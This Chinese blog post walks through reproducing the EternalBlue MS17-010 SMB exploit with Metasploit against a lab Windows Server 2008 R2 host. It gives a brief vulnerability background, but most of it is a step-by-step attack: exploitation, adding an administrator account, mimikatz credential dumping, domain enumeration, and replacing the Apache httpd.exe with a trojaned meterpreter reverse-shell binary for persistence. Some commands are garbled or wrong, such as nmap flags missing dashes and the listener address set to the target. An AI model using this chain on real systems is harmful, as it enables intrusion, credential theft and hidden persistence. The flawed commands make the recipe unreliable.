永恒之蓝MS17-010漏洞复现
永恒之蓝MS17-010漏洞复现
1.永恒之蓝简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
2.漏洞原理
漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。然后会进行如下操作:
srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小
因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大
因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出
3 影响版本
目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
4.漏洞环境搭建
靶机:Windows Server 2008 R2
攻击机: kali
5.复现过程
1.启动靶机
靶机为Windows Server 2008 R2,ip为192.168.1.128
2.端口探测
sudo nmap A -p- -sS sC -T4 -Pn 192.168.1.128
探测到靶机开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞
6.打开MSF进行渗透
msfconsole
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010 #进行扫描探测
set RHOST 192.168.1.128
run
Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 #表示存在该漏洞
7.使用漏洞模块进行攻击
use exploit/windows/smb/ms17_010_eternalblue #设置模块
set RHOST 192.168.1.128 #设置攻击目标
show options #查看设置情况
exploit #进行攻击
查看权限信息
shell
chcp 65001 解决进入shell中中文乱码whoami/groups 查看我们当前的权限getuid 查看已经获得的权限systeminfo 查看系统信息,以及已打的补丁netstat -an 查看开启端口号net user username password /add windows 中添加用户net localgroup administrators username /add 把添加的用户添加到管理员组useradd –g 组名 用户名 linux下添加用户到root组**使用mimikatz抓取密码**:用于在meterpreter模式下提权为systerm,在32位的进程中比较强大(1)在windows 2000 和 windowsxp中无法使用 (2)mimikatz_command -f hash ::(3)kerberos 抓取系统票据(4)wdigest 获取系统账户信息查询域名称:net view /domain查询域内计算机:net view /doamin:xx查询域控制器时间:net time /domain查询域管理用户:net group "domain admins" /domain得到域控制主机名:net group "domain controllers" /domain获取域控主机名:net group "domain controllers" /domain
拿到shell后
是乱码输入 chcp 65001就好了
创建一个用户
net user kkk 123456abc# /add #密码不能太简单,否则创建失败
8.上传后门
ps -S httpd.exe
use payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.128
generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-door.exe启动一个监听,监听后门的反向连接,并使用 expolit-j 放到后台
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.128
exploit -j切回之前的 meterpreter session,上传后门文件并重命名
cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
pwd
mv httpd.exe httpd.exe.bak
upload /root/httpd-door.exe
mv httpd-door.exe httpd.exe重启 wampapache 服务
shell
exit
永恒之蓝MS17-010漏洞复现相关推荐
- 永恒之蓝(ms17-010)简介与复现
一.永恒之蓝的介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...
- 永恒之蓝和震网病毒复现
永恒之蓝 1.打开msf 2.漏洞编码查找 search ms17_010 使用:use auxiliary/scanner/smb/smb_ms17_010 靶机探测:set rhosts 192. ...
- 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...
- 永恒之蓝漏洞复现测试
永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...
- 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...
- Metasploit渗透框架介绍及永恒之蓝复现
Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...
- 09永恒之蓝与永恒之黑的复现
一.永恒之蓝 1.简介 2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时 ...
- 永恒之蓝(EternalBlue)实例复现
一.前言 2017年4月的时候,Shadow broker在网络上公布一批NSA(美国国家安全局)使用的网络武器,其中就包含一种工具,可以远程控制有漏洞的任何一台windows机器,正是这些工具的问世 ...
- 不死的Eternal Blue(永恒之蓝)
文章转自公众号:网络安全资源库 搞安全的没有不知道"永恒之蓝"的.当初著名的勒索病毒WannaCry如今已经不多见了,但"永恒之蓝",却还未死. 一.勒索蠕虫时 ...
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...
最新文章
- 解决每次git pull需要不用输入用户名信息
- Java中import及package的用法
- 国内网络环境优化qiime2安装过程-QIIME 2安装慢或无法下载的解决方案
- 实验三:XML模型(二)
- linux线程同步之互斥锁——linux的关键区域
- Java后端学习路线【哔哩哔哩网站】【Java基础、SSM框架、Maven、Mysql、Idea的使用、Springboot、Sprinfcloud、设计模式】
- Linux——curl(转)
- 《WinForm开发系列之控件篇》Item25 Lable(暂无)
- tp5中php正则怎么写,详解tp5中phpmailer的使用
- 线段树 B数据结构 牛客练习赛28
- python下载-【Python下载 官方版】Python 3.8.0-ZOL软件下载
- python可以做什么工作-Python入门后,想要从事自由职业可以做哪方面工作?
- 电脑音频服务未运行怎么解决_【电脑技能】女生专属,学会这几招也可以修好你的电脑...
- 201521123004 《Java程序设计》第2周学习总结
- POJ2728 最小比率生成树/0-1分数规划/二分/迭代(迭代不会)
- 一键安装lamp环境 centos
- 2018-2-13-win10-uwp-如何让WebView标识win10手机
- Mozilla发布开发者专用浏览器Fx10
- ViewPage2和Fragment以及Tablayout使用
- 对抗生成网络(Generative Adversarial Network)